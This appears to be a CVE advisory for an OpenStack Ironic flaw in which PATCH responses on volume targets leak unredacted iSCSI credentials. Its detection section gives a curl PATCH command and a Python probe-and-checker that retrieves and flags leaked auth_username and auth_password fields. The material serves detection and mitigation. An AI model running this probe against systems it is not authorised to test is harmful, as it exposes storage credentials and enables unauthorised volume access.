CVE-2026-54421
OpenStack Ironic Volume Properties PATCH Information Disclosure

Publication date: 2026-06-14

Last updated on: 2026-06-14

Assigner: MITRE

Description
In OpenStack Ironic through 35.0.1, when applying a PATCH to update fields in volume properties the user is authorized for, Ironic can return unredacted sensitive information (such as iSCSI credentials). The PATCH outcome is a security issue; the POST outcome is not a security issue.
Affected Vendors & Products
Vendor     Product   Version / Range
openstack  ironic    through 35.0.1 (inclusive)
CWE ID Description
CWE-212 The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.
Detection Guidance

Detect this by comparing what a PATCH response returns with what the same principal is allowed to read. The sensitive data lives in the properties field of a volume target (the Ironic resource that carries iSCSI connection details), which Ironic redacts on GET for callers lacking baremetal:volume:view_target_properties but, in affected versions, returns in full in the PATCH response.

Specifically, test with a credential that holds baremetal:volume:update but not baremetal:volume:view_target_properties, patch a field that credential is allowed to change, and inspect the returned object.

Ironic PATCH bodies are JSON Patch (RFC 6902) arrays, so the request must send an array of operations rather than a partial object, and volume endpoints require API microversion 1.32 or later.

  • Obtain a token for a user with update but not view-target-properties rights, and confirm that GET /v1/volume/targets/<target-uuid> returns redacted properties for that user.
  • Send a PATCH to the same resource that changes a harmless permitted field (extra is a free-form dictionary).
  • Inspect the properties in the response body for unredacted fields such as auth_username or auth_password.
  • Example curl command (replace placeholders accordingly):
  • curl -X PATCH "https://<ironic-api-endpoint>/v1/volume/targets/<target-uuid>" -H "X-Auth-Token: <token>" -H "X-OpenStack-Ironic-API-Version: 1.32" -H "Content-Type: application/json" -d '[{"op": "add", "path": "/extra/probe", "value": "1"}]'

If the PATCH response returns the real iSCSI connection details while the GET for the same user returns them redacted, the vulnerability is present. Clean up afterwards with a second PATCH carrying {"op": "remove", "path": "/extra/probe"}.
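The procedure above, as an added example that is not part of this page or of Ironic's own code: a small Python module that builds the JSON Patch probe and classifies a PATCH response as redacted or leaking. The volume-target path, the 1.32 microversion header, the list of secret-bearing property keys, the redaction markers and both sample responses are assumptions or constructed data, not captured from a real deployment; verify the path and redaction format against your Ironic release before relying on the verdict.

```python
"""Probe builder and response checker for the Ironic volume-target PATCH
disclosure. Added example; not Ironic project code."""
import json
import re
from typing import Any, Dict, List, Union

# Assumed (not stated on this page): Ironic's volume-target resource path and
# the API microversion that introduced volume targets. Check your deployment.
VOLUME_TARGETS_PATH = "/v1/volume/targets/{uuid}"
IRONIC_API_VERSION = "1.32"

# Property keys that hold secrets in iSCSI volume-target properties.
# Constructed list, named after the fields used for iSCSI boot-from-volume.
SENSITIVE_KEY_RE = re.compile(r"password|secret|token|auth_username", re.IGNORECASE)

# Markers a redacting server may substitute for a value. Assumption: the exact
# marker text varies by release, so the match is deliberately loose.
REDACTION_MARKERS = ("******", "redacted")


def build_probe(endpoint: str, target_uuid: str, token: str) -> Dict[str, Any]:
    """Build a PATCH that changes only /extra, a free-form field, so the caller
    needs baremetal:volume:update and nothing else. Ironic PATCH bodies are
    JSON Patch (RFC 6902) arrays, not partial objects."""
    return {
        "method": "PATCH",
        "url": endpoint.rstrip("/") + VOLUME_TARGETS_PATH.format(uuid=target_uuid),
        "headers": {
            "X-Auth-Token": token,
            "X-OpenStack-Ironic-API-Version": IRONIC_API_VERSION,
            "Content-Type": "application/json",
        },
        "body": [{"op": "add", "path": "/extra/cve_probe", "value": "1"}],
    }


def is_redacted(value: Any) -> bool:
    """True if a value is a redaction placeholder rather than real data."""
    if isinstance(value, dict):
        # Assumption: a redacting server replaces the whole properties dict
        # with a single marker key instead of the real connection details.
        return set(value) <= {"redacted_contents"}
    return isinstance(value, str) and any(m in value.lower() for m in REDACTION_MARKERS)


def leaked_properties(response: Union[str, Dict[str, Any]]) -> List[str]:
    """Return the sensitive property keys that came back with real values.
    An empty list means the properties were redacted or carry no secrets."""
    doc = json.loads(response) if isinstance(response, str) else response
    props = doc.get("properties")
    if not isinstance(props, dict) or is_redacted(props):
        return []
    return sorted(k for k, v in props.items()
                  if SENSITIVE_KEY_RE.search(k) and not is_redacted(v))


# Constructed sample responses for a user lacking view_target_properties.
# The UUID and connection details are made up.
REDACTED_RESPONSE = {
    "uuid": "11111111-2222-3333-4444-555555555555",
    "volume_type": "iscsi", "boot_index": 0, "extra": {"cve_probe": "1"},
    "properties": {"redacted_contents": "** Value redacted: requires "
                                        "baremetal:volume:view_target_properties **"},
}
LEAKING_RESPONSE = {
    "uuid": "11111111-2222-3333-4444-555555555555",
    "volume_type": "iscsi", "boot_index": 0, "extra": {"cve_probe": "1"},
    "properties": {
        "target_portal": "10.0.0.5:3260",
        "target_iqn": "iqn.2010-10.org.openstack:volume-1234",
        "target_lun": 1,
        "auth_method": "CHAP",
        "auth_username": "chapuser",
        "auth_password": "chapsecret",
    },
}

if __name__ == "__main__":
    probe = build_probe("https://ironic.example:6385", LEAKING_RESPONSE["uuid"], "<token>")
    print(probe["method"], probe["url"])
    print(json.dumps(probe["body"]))
    for name, body in (("redacted", REDACTED_RESPONSE), ("leaking", LEAKING_RESPONSE)):
        leaked = leaked_properties(body)
        print(f"{name}: {'VULNERABLE, leaked ' + ', '.join(leaked) if leaked else 'redacted, OK'}")
```

Send the probe with any HTTP client, then pass the JSON response body to leaked_properties; a non-empty result for a user whose GET on the same target is redacted is the positive finding. The checker matches on key names rather than on the redaction string because a future release may word the marker differently, and it treats a properties dict consisting only of a marker key as redacted so that a fixed server yields an empty list.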

Mitigation Strategies

Immediate mitigation is to apply the fix from the OpenStack Ironic project that enforces the same redaction in the PATCH response as in GET. This page lists affected versions through 35.0.1 and does not name the first fixed release; take it from the Ironic security advisory for this CVE.

Until the fix is deployed, do not grant baremetal:volume:update to any role that lacks baremetal:volume:view_target_properties. A caller who can update a volume target can read its full properties through the PATCH response anyway, so keeping the two permissions aligned closes the gap instead of hiding it: either remove update rights from roles that must not see iSCSI credentials, or accept that such roles can see them and grant the view permission explicitly.

Review custom policy.yaml overrides for any role that gets the volume update rule without the view rule, and if audit logs show such a role issuing PATCH requests against volume targets, treat the corresponding iSCSI credentials as exposed.

  • Apply the Ironic update that fixes the PATCH redaction.
  • Do not grant volume update rights to roles that lack view-target-properties rights; remove one or add the other.
  • Monitor PATCH responses on /v1/volume/targets for unredacted properties until the fix is in place.
Compliance Impact

This vulnerability in OpenStack Ironic exposes unredacted sensitive information, such as iSCSI credentials, to users who are authorized to update volume properties but lack permission to view sensitive details. Such exposure of sensitive credentials can lead to unauthorized access to storage volumes.

The leakage of sensitive information could potentially violate compliance requirements under common standards and regulations like GDPR and HIPAA, which mandate the protection of sensitive data and restrict unauthorized access.

Therefore, organizations running affected versions of OpenStack Ironic face increased non-compliance risk if the volumes those credentials unlock hold regulated data.

Executive Summary

CVE-2026-54421 is a security vulnerability in OpenStack Ironic up to version 35.0.1 where sensitive information, such as iSCSI credentials, can be exposed in API responses when a user applies a PATCH request to update volume properties.

The root cause is that the policy check that redacts sensitive volume-target properties (baremetal:volume:view_target_properties) is applied when the object is read, but not to the object returned in the response to a write such as PATCH or POST. Users holding baremetal:volume:update but not the view permission therefore receive the stored object with its credentials intact.

The POST outcome is not considered a security issue because the response only echoes data the caller just supplied; the PATCH response returns the stored object, including iSCSI connection details the caller was never allowed to read, so it can leak credentials and enable unauthorized access to storage volumes.

Impact Analysis

This vulnerability can lead to the exposure of sensitive information such as iSCSI credentials to users who should not have access to them.

If exploited, users holding baremetal:volume:update without the corresponding view permission could retrieve iSCSI connection details and credentials that let them connect to storage volumes outside the intended provisioning flow.

This exposure could compromise the confidentiality of storage systems and potentially lead to unauthorized data access or manipulation.
